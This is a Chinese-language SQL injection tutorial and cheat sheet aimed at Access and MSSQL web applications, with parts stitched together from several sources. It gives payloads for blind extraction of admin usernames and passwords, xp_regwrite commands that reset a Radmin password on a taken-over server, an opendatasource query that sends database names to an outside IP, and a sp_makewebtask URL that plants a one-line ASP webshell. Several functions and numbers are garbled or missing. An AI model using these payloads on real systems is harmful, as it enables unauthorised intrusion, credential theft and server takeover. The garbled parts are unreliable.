SQL注入步骤和常用函数以及中文处理方法

第一节 SQL注入的一般步骤 首先 判断环境 寻找注入点 判断数据库类型 这在入门篇已经讲过了 其次 根据注入参数类型 在脑海中重构SQL语句的原貌 按参数类型主要分为下面三种 (A)　ID= 这类注入的参数是数字型 SQL语句原貌大致如下 Select * from 表名 where 字段= 注入的参数为ID= And [查询条件] 即是生成语句 Select * from 表名 where 字段= And [查询条件](B) Class=连续剧 这类注入的参数是字符型 SQL语句原貌大致概如下 Select * from 表名 where 字段= 连续剧 注入的参数为Class=连续剧 and [查询条件] and = 即是生成语句 Select * from 表名 where 字段= 连续剧 and [查询条件] and = (C) 搜索时没过滤参数的 如keyword=关键字 SQL语句原貌大致如下 Select * from 表名 where 字段like %关键字% 注入的参数为keyword= and [查询条件] and % = 即是生成语句 Select * from 表名 where字段like % and [查询条件] and % = % 接袜型着 将查询条件替换成SQL语句 猜解表名 例如 ID= And (Select Count(*) from Admin)>= 如果页面就与ID= 的相同 说明附加条件成立 即表Admin存在 反之 即不存在（请牢记这种方法） 如此循环 直至猜到表名为止 表名猜出来后 将Count(*)替换成Count(字段名) 用同样的原理猜解字段名 有人会说 这里有一些偶然的成分 如果表名起得很复杂没规律的 那根本就没得玩下去了 说得很对 这世界根本就不存在 %成功的黑客技术 苍蝇不叮无缝的蛋 无论多技术多高深的黑客 都是因为别人的程序写得不严密或使用者保密意识不够 才有得下手 有点跑题了 话说回来 对于SQLServer的库 还是有办法让程序告诉我们表名及字段名的 我们在高级篇中会做介绍 最后 在表名和列名猜解成功后 再使用SQL语句 得出字段的值 下面介绍一种最常用的方法－Ascii逐字解码法 虽然这种方法速度很慢 但肯定是可行的方法 我们举个例子 已知表Admin中存在username字段 首先 我们取第一条记录 测试长度 ?id= and (select top len(username) from Admin)>先说明原理 如果top 的username长度大于 则条件成立 接着就是>>>这样测试下去 一直到条件唯漏不成立为止 比如>成立 >不成立 就是len(username)= 当然没人会笨得从 一个个测试 怎么样才比较快就看各自发挥了 在得到username的长度后 用mid(username N )截取第N位字符 再asc(mid(username N ))得到ASCII码 比如 id= and (select top asc(mid(username )) from Admin)>同样也是用逐步缩小范围的方法得到第 位字符的ASCII码 注意的是英文和数字的ASCII码告山猜在 之间 可以用折半法加速猜解 如果写成程序测试 效率会有极大的提高 第二节 SQL注入常用函数 有SQL语言基础的人 在SQL注入的时候成功率比不熟悉的人高很多 我们有必要提高一下自己的SQL水平 特别是一些常用的函数及命令 Access asc(字符)　SQLServer unicode(字符)作用 返回某字符的ASCII码Access chr(数字)　SQLServer nchar(数字)作用 与asc相反 根据ASCII码返回字符Access mid(字符串 N L)　SQLServer substring(字符串 N L)作用 返回字符串从N个字符起长度为L的子字符串 即N到N+L之间的字符串Access abc(数字)　SQLServer abc (数字)作用 返回数字的绝对值（在猜解汉字的时候会用到）Access A beeen B And C　SQLServer A beeen B And C作用 判断A是否界于B与C之间 第三节 中文处理方法 在注入中碰到中文字符是常有的事 有些人一碰到中文字符就想打退堂鼓了 其实只要对中文的编码有所了解 中文恐惧症 很快可以克服 先说一点常识 Access中 中文的ASCII码可能会出现负数 取出该负数后用abs()取绝对值 汉字字符不变 SQLServer中 中文的ASCII为正数 但由于是UNICODE的双位编码 不能用函数ascii()取得ASCII码 必须用函数unicode ()返回unicode值 再用nchar函数取得对应的中文字符 了解了上面的两点后 是不是觉得中文猜解其实也跟英文差不多呢？除了使用的函数要注意 猜解范围大一点外 方法是没什么两样的 lishixinzhi/Article/program/SQLServer/201311/22039

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1

某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite

'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite

'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port'卖宽败,'REG_BINARY',0xd20400 则端口值改为1234

create database lcx

Create TABLE ku(name nvarchar(256) null)

Create TABLE biao(id int NULL,name nvarchar(256) null)

//得到数据库名 insert into opendatasource('sqloledb','server=211.39.145.163,1443uid=testpwd=pafpafdatabase=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中创建表，看看权限怎样

Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL)--

用 sp_makewebtask直接在web目录里写入一句话马： http://127.0.0.1/dblogin123.asp?usernam ... btask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20'--

//更新表巧缺内容

Update films SET kind = 'Dramatic' Where id = 123

//删除内容

delete from table_name where Stockid = 3 SQL注射语句的经典总结

SQL注射语中颤句

1.判断有无注入点 ' and 1=1 and 1=2

2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *)

and 0<>(select count(*) from admin) ---判断是否存在admin这张表

3.猜帐号数目如果遇到0<返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin)

4.猜解字段名称在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*)>0)--

and 1=(select count(*) from admin where len(用户字段名称name)>0) and 1=(select count(*) from admin where len(密码字段名称password)>0)

5.猜解各个字段的长度猜解长度就是把>0变换直到返回正确页面为止 and 1=(select count(*) from admin where len(*)>0)

and 1=(select count(*) from admin where len(name)>6) 错误

and 1=(select count(*) from admin where len(name)>5) 正确长度是6 and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确

and 1=(select count(*) from admin where len(password)>12) 错误长度是12 and 1=(select count(*) from admin where len(password)=12) 正确

6.猜解字符

and 1=(select count(*) from admin where left(name,1)='a') ---猜解用户帐号的第一位 and 1=(select count(*) from admin where left(name,2)='ab')---猜解用户帐号的第二位

就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --

这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

看服务器打的补丁=出错了打了SP4补丁 and 1=(select ｛AT｝@VERSION)--

看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。 and 1=(Select IS_SRVROLEMEMBER('sysadmin'))--

---